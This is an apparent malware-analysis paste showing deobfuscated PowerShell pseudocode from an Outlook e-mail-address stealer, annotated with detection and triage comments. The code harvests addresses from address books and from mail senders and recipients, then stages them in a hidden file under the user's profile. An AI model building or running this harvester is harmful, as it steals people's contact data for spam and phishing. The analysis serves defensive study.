ps66uk

email_stealer

Jun 28th, 2019
  1. # deobfuscated pseudocode from l.ps1 - https://app.any.run/tasks/9433b851-34b9-462b-895e-26a8402b9985
  2.  
  # Setup: loads the Outlook interop assembly and attaches to Outlook through COM
  # automation; $MAPI is the MAPI namespace every later function reads from.
  # Hunting: a PowerShell host instantiating Outlook.Application is recorded by
  # script block logging (event 4104) where that logging is enabled.
  3. Add-Type -assembly Microsoft.Office.Interop.Outlook
  4. $NEW_OUTLOOK = New-Object -comobject Outlook.Application
  # NOTE(review): MAPI is unquoted here - this listing is analyst pseudocode, not runnable script.
  5. $MAPI = $NEW_OUTLOOK.GetNameSpace(MAPI)
  # NOTE(review): the list is declared as $COLLECTION, but every later reference uses
  # $OUTLOOK_EXPORT, which is never defined in this listing - presumably one list under
  # two names introduced during deobfuscation; confirm against the original l.ps1.
  6. $COLLECTION = [System.Collections.ArrayList]@()
  7.  
  # CHECK_VALID: returns $true when the candidate string matches the e-mail pattern
  # below and $false otherwise. The pattern allows letters, digits, '_' and '-' in
  # dot-separated labels around a single '@' and requires a final label of 2-4 letters.
  # PowerShell's -match is case-insensitive by default.
  8. function CHECK_VALID($STOLEN_ADDRESS)
  9. {
  10. $EMAIL_REGEX = "^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"
  11. if ($STOLEN_ADDRESS -match $EMAIL_REGEX) {
  12. return $true
  13. }
  14. return $false
  15. }
  16.  
  # COLLECT_INFO: normalises one harvested address and appends it to the in-memory
  # list if it is well-formed and not already present. Empty or null input is ignored.
  17. function COLLECT_INFO($STOLEN_ADDRESS) {
  18. if ($STOLEN_ADDRESS) {
  19. $KNOWN_ADDRESS = $false
  # Normalisation: lower-case, then strip one pair of surrounding single quotes.
  20. $STOLEN_ADDRESS = $STOLEN_ADDRESS.ToLower()
  21. if ($STOLEN_ADDRESS.StartsWith("'") -And $STOLEN_ADDRESS.EndsWith("'")) {
  22. $STOLEN_ADDRESS = $STOLEN_ADDRESS.Substring(1, $STOLEN_ADDRESS.Length - 2)
  23. }
  24. if (CHECK_VALID($STOLEN_ADDRESS)) {
  # De-duplication by linear scan of the list collected so far.
  # NOTE(review): $OUTLOOK_EXPORT is not defined anywhere in this listing; the only
  # list created at top level is $COLLECTION - presumably the same object.
  25. for($CT_ADDRESSES = 0;$CT_ADDRESSES -lt $OUTLOOK_EXPORT.Count;$CT_ADDRESSES++) {
  26. if ($OUTLOOK_EXPORT[$CT_ADDRESSES] -eq $STOLEN_ADDRESS) {
  27. $KNOWN_ADDRESS = $true
  28. break
  29. }
  30. }
  31. if (-Not $KNOWN_ADDRESS) {
  # $FINAL_EXPORT receives the return value of Add() and is not read again in this
  # listing - presumably assigned only to keep that value out of the output stream.
  32. $FINAL_EXPORT = $OUTLOOK_EXPORT.Add($STOLEN_ADDRESS)
  33. }
  34. }
  35. }
  36. }
  37.  
  # STEAL_ADDRESS_LISTS: walks every address list exposed by the MAPI namespace and
  # passes each entry's SMTP address to COLLECT_INFO. Outlook COM collections are
  # 1-based, hence the loops starting at 1.
  # Incident scoping: the source is the profile's address books, not only addresses
  # seen in mail; on an Exchange-connected profile this presumably includes directory
  # entries (verify which lists AddressLists returned on the affected host).
  38. function STEAL_ADDRESS_LISTS {
  39. $CT_ADDRESS_LIST = $MAPI.AddressLists
  40. for($CT_ADDRESS = 1;$CT_ADDRESS -le $CT_ADDRESS_LIST.Count;$CT_ADDRESS++) {
  41. $CT_ADDRESS_ENTRY = $CT_ADDRESS_LIST.Item($CT_ADDRESS).AddressEntries
  42. for($OL_ADDRESS = 1;$OL_ADDRESS -le $CT_ADDRESS_ENTRY.Count;$OL_ADDRESS++) {
  43. $CURR_ADDRESS = $CT_ADDRESS_ENTRY.Item($OL_ADDRESS)
  44. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
  45. $STOLEN_ADDRESS = ""
  # OlAddressEntryUserType 10 = olOutlookContactAddressEntry: the address is read directly.
  46. if ($CURR_ADDRESS_TYPE -eq 10) {
  47. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
  # Values 0-5 are the Exchange entry types (user, distribution list, public folder,
  # agent, organization, remote user): resolved to the primary SMTP address instead.
  48. } elseif (($CURR_ADDRESS_TYPE -eq 3) -Or ($CURR_ADDRESS_TYPE -eq 1) -Or ($CURR_ADDRESS_TYPE -eq 4) -Or ($CURR_ADDRESS_TYPE -eq 2) -Or ($CURR_ADDRESS_TYPE -eq 5) -Or ($CURR_ADDRESS_TYPE -eq 0)) {
  49. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
  50. }
  # Any other entry type leaves $STOLEN_ADDRESS empty, which COLLECT_INFO ignores.
  51. COLLECT_INFO($STOLEN_ADDRESS)
  52. }
  53. }
  54. }
  55.  
  # STEAL_EMAIL_ADDRESS: walks mail folders and, for every item, passes each recipient
  # address and the sender address to COLLECT_INFO, then descends into subfolders.
  # NOTE(review): the parameter is written as the expression $MAPI.Folders, which is not
  # a parameter declaration - the analyst's renaming evidently substituted the argument
  # for the parameter name, so the loops below read as the top-level folders even on the
  # nested call. Treat the traversal as pseudocode and confirm against the original l.ps1.
  56. function STEAL_EMAIL_ADDRESS($MAPI.Folders) {
  57. for($CT_FOLDERS = 1;$CT_FOLDERS -le $MAPI.Folders.Count;$CT_FOLDERS++) {
  58. $CURR_FOLDER = $MAPI.Folders.Item($CT_FOLDERS)
  59. $CURR_ITEMS = $CURR_FOLDER.Items
  60. for($OL_ITEM = 1;$OL_ITEM -le $CURR_ITEMS.Count;$OL_ITEM++) {
  61. $INDIV_EMAIL = $CURR_ITEMS.Item($OL_ITEM)
  # Recipients of the item.
  62. $RECIPIENTS = $INDIV_EMAIL.Recipients
  63. for($CURR_RECIPIENT = 1;$CURR_RECIPIENT -le $RECIPIENTS.Count;$CURR_RECIPIENT++) {
  64. $CURR_RECIPIENT_DETAILS = $RECIPIENTS.Item($CURR_RECIPIENT)
  65. $CURR_ADDRESS = $CURR_RECIPIENT_DETAILS.AddressEntry
  66. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
  67. $STOLEN_ADDRESS = "";
  # OlAddressEntryUserType 0 = olExchangeUserAddressEntry: resolved to the primary SMTP address.
  68. if ($CURR_ADDRESS_TYPE -eq 0) {
  69. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
  # 30 = olSmtpAddressEntry, 10 = olOutlookContactAddressEntry: the address is read directly.
  70. } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
  71. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
  72. }
  73. COLLECT_INFO($STOLEN_ADDRESS)
  74. }
  # Sender of the item, handled with the same type mapping as the recipients above.
  75. $CURR_ADDRESS = $INDIV_EMAIL.Sender
  76. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
  77. $STOLEN_ADDRESS = "";
  78. if ($CURR_ADDRESS_TYPE -eq 0) {
  79. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
  80. } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
  81. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
  82. }
  83. COLLECT_INFO($STOLEN_ADDRESS)
  84. }
  # Nested call with the current folder's subfolders.
  85. STEAL_EMAIL_ADDRESS($CURR_FOLDER.Folders)
  86. }
  87. }
  88.  
  # GET_LIST_AND_EMAIL: runs both harvesters (address books, then mail folders) and
  # appends the collected list to a file in the user's roaming profile.
  # Host artefact: %APPDATA%\Microsoft\.Outlook - file-creation telemetry on that path
  # is a direct indicator for this script.
  # Nothing in this listing transmits the file; it only stages the data on disk, so
  # retrieval is presumably handled by another component of the sample.
  89. function GET_LIST_AND_EMAIL() {
  90. STEAL_ADDRESS_LISTS
  91. STEAL_EMAIL_ADDRESS($MAPI.Folders)
  92.  
  93. Add-Content $env:APPDATA\Microsoft\.Outlook $OUTLOOK_EXPORT
  94. }
  95.  
  # STEAL_EMAIL_INFO: run-once guard. If the marker file does not exist, it is created
  # empty and the harvest is started; if it exists, nothing happens.
  # NOTE(review): $CHECK_FILE is not defined in this listing, so the marker path has to
  # be recovered from the original l.ps1 or the sandbox report.
  # Triage: the marker is written before the harvest call, so its presence shows the
  # harvest was at least started on that host, not that it completed.
  96. function STEAL_EMAIL_INFO() {
  97. $FILE_EXISTS = [System.IO.File]::Exists($CHECK_FILE)
  98. if (-Not $FILE_EXISTS) {
  # sc is the Windows PowerShell alias for Set-Content; this writes the empty marker file.
  99. "" | sc $CHECK_FILE
  100. GET_LIST_AND_EMAIL
  101. }
  102. }
  103.  
  # Script entry point: the only top-level call; everything else runs from here.
  104. STEAL_EMAIL_INFO